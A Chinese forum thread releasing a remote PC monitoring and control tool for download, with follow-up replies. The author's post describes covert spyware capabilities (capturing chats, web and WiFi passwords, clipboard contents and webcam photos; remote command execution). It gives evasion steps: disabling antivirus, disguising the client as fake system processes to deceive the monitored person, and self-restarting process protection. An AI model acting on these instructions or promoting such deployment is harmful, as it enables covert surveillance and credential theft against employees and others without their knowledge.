吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

注册[Register]

QQ登录

只需一步,快速开始

[原创工具] 帅乾神目_电脑监控系统v1.4【SQ原创】2021-05-20更新

luobei 发表于 2021-5-8 17:36

新版本和旧版本不兼容
卸载旧版本后在安装1.4版本

如果遇到问题,请认真阅读以下内容

客户端卸载方法:
结束不了进程,怎么卸载呀?
1、到开机启动目录里,删除开启启动
2、重启电脑
3、删除文件夹C:\Windows\svchosts 和 C:\Windows\winlogin

软件界面

电视墙界面

详细说明,参考上一帖
https://www.52pojie.cn/thread-1159004-1-1.html

神目客户启动v1.4 是 被控端
帅乾神目v1.4        是 控制端

功能简介
终端信息计算机名称、操作系统、ip地址、Mac地址、cpu型号、内存大小
远程开机:关机状态下远程唤醒开机,半夜给公司电脑开机会不会吓死
远程控制
实时画面、画面压缩传输、鼠标操作、关机、取消关机、键盘等操作
终端聊天记录:目前只支持QQ,微信(拦截内容可能会不全)
终端网页记录:IE浏览器、360浏览器、QQ浏览器、谷歌浏览器
终端WIFI记录获取终端连接过的wifi密码
终端剪切板记录终端复制过什么
浏览器地址栏记录:浏览器的地址栏记录
网页密码监控:网页密码监控记录(ie浏览器),自从有了密码监控全公司都害怕了
终端进程信息右键可结束进程
终端当前运行窗口右键可关闭对方窗口
文件管理上传、下载、删除
局域网设备支持切换网卡,右键可添加到终端列表
远程执行:cmd命令
支持控制公网设备在局域网设备界面,手动添加公网IP即可
查看终端共享文件夹
摄像头拍照:打开客户端摄像头并拍照(可能会有bug 未修复)
开机启动、界面隐藏、进程保护(再也不怕客户结束咱们的控制进程了)
手机端控制:手机随时控制,输入网址即可:http://客户端ip:9528 手机网页控制电脑,也能装13一把了
窗口黑名单:新建关键词即可,例如:斗地主,发现斗地主相关窗口自动关闭(再也不怕熊孩子玩游戏了)
客户端弹框(不听话就给他弹出一个提示)
短信提醒:发现设定窗口后,短信提醒(已支持,由于短信费用问题未公开)

【v1.4更新内容】

Bug修复
1、连接离线客户卡住问题,已修复
2、win10画面不全,已修复
3、摄像头拍照bug,已修复,需ffmpeg文件(部分摄像头检测不到)
4、安全管家冲突一直截图问题,已修复

新增
1、增加传输优化,解决远程画面卡顿问题
2、多画面电视墙(先在左侧列表,右键,添加到电视墙)
3、批量操作:批量开机、批量关机
4、局域网设备列表,增加Ping刷新
5、发现聊天界面,自动快照(QQ、WX)
6、增加聊天界面自动快照开关
7、文件管理,增加让客户打开指定文件
8、客户端偶尔卡死,新增假死刷新
9、增加U盘记录、弹出U盘、禁用U盘(弹出和禁用部分客户端电脑不行)
10、增加许可U盘,在禁用U盘情况下,只允许使用指定U盘(部分客户端电脑不行)

注意事项:
1、客户端运行时,要关闭杀毒软件
2、客户端电脑的杀毒软件,添加两个信任目录C:\Windows\svchosts 和 C:\Windows\winlogin
3、伪装系统进程winlogin 和 svchosts 迷惑客户
4、进程双向保护,结束进程会自动启动回来
5、如果提示初始化失败:右键--管理员运行即可
6、添加公网方法:在局域网列表里,右上角,加号,里面填写公网ip,公网端口是9527,客户端记得做好端口映射

请勿违法犯罪,一切后果自负
此系统不是让大家违法犯罪的

大家的关心和厚爱就是SQ不断创新的动力,Thanks

杀软会报毒,疑者请绕行

我们公司每天晚上都有保洁阿姨打扫,SQ在家通过远程唤醒,把公司电脑开机,并播放了一曲“优美”的歌曲
第二天。。。 你懂的

神目客户启动v1.3.zip

2.17 MB, 下载次数: 7201, 下载积分: 吾爱币 -2 CB

帅乾神目v1.3.zip

3.16 MB, 下载次数: 7099, 下载积分: 吾爱币 -2 CB

神目客户启动v1.4.zip

2.17 MB, 下载次数: 12577, 下载积分: 吾爱币 -2 CB

帅乾神目v1.4.zip

3.54 MB, 下载次数: 13158, 下载积分: 吾爱币 -2 CB

免费评分

smallbat + 1 + 1 谢谢@Thanks!
冷丶眸 + 1 + 1 谢谢@Thanks!
OUTSIDER123 + 1 谢谢@Thanks!
xiaolong7645 + 1 + 1 谢谢@Thanks!
rocsheng + 1 + 1 谢谢@Thanks!
小悟先生 + 1 + 1 虚拟机已试用,
xiaojiang777 + 1 + 1 谢谢@Thanks!
PMCN + 1 用心讨论,共获提升!
Ta'ta + 1 + 1 谢谢@Thanks!
魔法兄贵 + 1 + 1 我很赞同!
she19890320 + 1 热心回复!
moon494 + 1 + 1 我很赞同!
miao2019 + 1 + 1 我很赞同!
xiangzhanglong + 1 + 1 我很赞同!
yj880513 + 1 热心回复!
琴笙 + 1 谢谢@Thanks!
romance13 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
aizyl521521 + 1 + 1 热心回复!
yxl88168 + 1 + 1 我很赞同!
gideon + 1 我很赞同!
jjyg.0871 + 1 + 1 大佬666啊
b516056942p + 1 谢谢@Thanks!
hu55142jin + 1 + 1 用心讨论,共获提升!
夏520 + 1 + 1 我很赞同!
Dark_Forest + 1 + 1 吓人啊,别让老板看见了
tk532666 + 1 + 1 谢谢@Thanks!
数流年 + 1 + 1 我很赞同!
wlzhgszgf + 1 + 1 谢谢@Thanks!
mm2904889 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
31412105 + 2 + 1 鼓励转贴优秀软件安全工具和文档!
wangbiao54qc + 1 + 1 我很赞同!
逍遥醉清风 + 1 + 1 我很赞同!
土匪龙 + 1 + 1 热心回复!
lulonghu + 1 我很赞同!
victy + 1 + 1 谢谢@Thanks!
yunfei2556 + 1 + 1 谢谢@Thanks!
wangyut85 + 1 + 1 谢谢@Thanks!
reyes + 1 + 1 谢谢@Thanks!
fjlouie + 1 + 1 用心讨论,共获提升!
Ayron + 1 谢谢@Thanks!
tisonluk + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
永恒的未来 + 1 谢谢@Thanks!
wangdaopei + 1 我很赞同!
Awesomezyf + 1 + 1 我很赞同!
buyaojuzi + 1 + 1 远程控制鼠标选项,不选和选择都能操作电脑鼠标求修改。
谷小白 + 1 + 1 用心讨论,共获提升!
rent8158669 + 1 + 1 谢谢@Thanks!
shihdhr + 1 + 1 好东西,收藏了~谢谢楼主
万能的楼下小黑 + 1 + 1 谢谢@Thanks!
yjqyjq1717 + 1 + 1 谢谢@Thanks!
轻轻闪过 + 1 + 1 谢谢@Thanks!
zw65655566 + 1 + 1 我很赞同!
xuq1981 + 1 + 1 谢谢@Thanks!
gjlgjl945 + 1 + 1 我很赞同!
awe197794732 + 1 + 1 谢谢@Thanks!
lzdj2015 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
iiexe + 1 + 1 谢谢@Thanks!
Grytt + 1 + 1 我很赞同!
duqi002616 + 1 + 1 感谢
dzma123 + 1 用心讨论,共获提升!
tkelos + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
丶小吟帝 + 1 谢谢@Thanks!
woaililu + 1 谢谢@Thanks!
lixilei + 1 鼓励转贴优秀软件安全工具和文档!
牧鸢 + 1 + 1 我很赞同!
wudakai1218 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
chengane + 1 鼓励转贴优秀软件安全工具和文档!
浅唱的dd + 1 + 1 我很赞同!
5201314025 + 1 谢谢@Thanks!
123456bbk + 1 谢谢@Thanks!
shellhuhu + 1 鼓励转贴优秀软件安全工具和文档!
getbt + 1 + 1 谢谢@Thanks!
雁来廿四 + 1 + 1 用心讨论,共获提升!
joket2004 + 1 英文版的启动不了,大佬能修复一下吗?
ainideshime + 1 + 1 ip正确,提示设备离线,请问怎么解决
nyie + 1 + 1 跨网段怎么操作,刷新不出客户端
ydddc + 1 + 1 谢谢@Thanks!
w668 + 1 + 1 先评分后下载,支持楼主后续更新
duanter + 1 + 1 热心回复!
bfgxp + 1 + 1 我很赞同!
vito_zhong + 1 谢谢@Thanks!
马可菠萝蜜 + 1 + 1 我很赞同!
yuchunlnog + 1 我很赞同!
daixingren007 + 1 + 1 谢谢@Thanks!
wdyy + 1 + 1 谢谢@Thanks!
Zhifeiyu + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
faber + 1 + 1 谢谢@Thanks!
faiz5555 + 1 + 1 谢谢@Thanks!
pengyuyan6 + 1 鼓励转贴优秀软件安全工具和文档!
bj1085329 + 1 我很赞同!
8u8纸飞机 + 1 + 1 谢谢@Thanks!
kaoqingbei678 + 1 谢谢 @Thanks!
xionghuaxin + 1 谢谢@Thanks!
bullshit + 1 + 1 谢谢@Thanks!
ckf6688 + 1 + 1 热心回复!
xw147369258 + 1 我很赞同!
KUKI + 1 + 1 谢谢@Thanks!
109638544 + 1 + 1 我很赞同!
胖小亮 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
hnnhxy + 1 非常感谢老板无私贡献,希望可以加上个服务端控制客户端远程更新。

本帖被以下淘专辑推荐:

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

楼主| luobei 发表于 2021-5-11 17:00
yalovem 发表于 2021-5-11 15:55
公司200台电脑,想全部给安装.....

水至清则无鱼,且玩且珍惜

免费评分

xiaoboy + 2 + 1 支持下,期待更完美。

njbhk2188 发表于 2021-5-8 20:08
大神看看有问题没有?

这类软件,怕毒就别玩了  发表于 2021-7-5 11:08

免费评分

xxdahai + 1 这类软件必然会报毒,不过有其他后门的概率很低。
aikexue + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!

howinbobo 发表于 2021-5-13 09:34
john1008 发表于 2021-5-10 09:48
我曾经晚上的时候就有这样吓过保安
john1008 发表于 2021-5-8 17:43
这版本微信能行不
 楼主| luobei 发表于 2021-5-8 17:45
john1008 发表于 2021-5-8 17:43
这版本微信能行不

能,但是拦截内容不全,会拦截到乱码什么的

免费评分

xiaoboy + 1 我很赞同!

楼主| luobei 发表于 2021-5-8 21:02
akhenry 发表于 2021-5-8 20:45
泄密主要的途径不是usb吗

usb检测进行中,更新到下个版本

免费评分

xiaoboy + 2 + 1 我很赞同!

楼主| luobei 发表于 2021-5-11 13:48
ddyyff120 发表于 2021-5-11 13:03
会突然连不上客端,客端是开机状态。而且局域网内可以ping通,是什么情况?

不要点击头像,那个头像是拍照,bug还没修复
pjlove 发表于 2021-5-8 21:15
谢谢,没cb了下载不了,谁给分享一下

免费评分

丿三小姐丶 + 1 我很赞同!
luobei + 2 用心讨论,共获提升!

h1eyingq1ing 发表于 2021-5-12 11:59
luobei 发表于 2021-5-12 11:09
抱歉,我说错了,手机访问端口是9528,公网端口是9527

搞好了大佬 联系无线后 弄了9528就可以看了 多谢大佬回复
天天虾虾 发表于 2021-5-8 17:44
装这个员工不得恨死了。
北葬梨花 发表于 2021-5-8 17:44
一楼占座
谁为我暖床 发表于 2021-5-8 17:46
不错的软件  支持                                      
john1008 发表于 2021-5-8 17:53
luobei 发表于 2021-5-8 17:45
能,但是拦截内容不全,会拦截到乱码什么的

微信和邮件能行就完美了,泄密主要的途径
麦迪就是帅 发表于 2021-5-8 18:03
感谢分享,下载看下!
zyszyhzylsy 发表于 2021-5-8 18:22
感谢大佬的分享
Jzh 发表于 2021-5-8 18:23
好东西啊 看看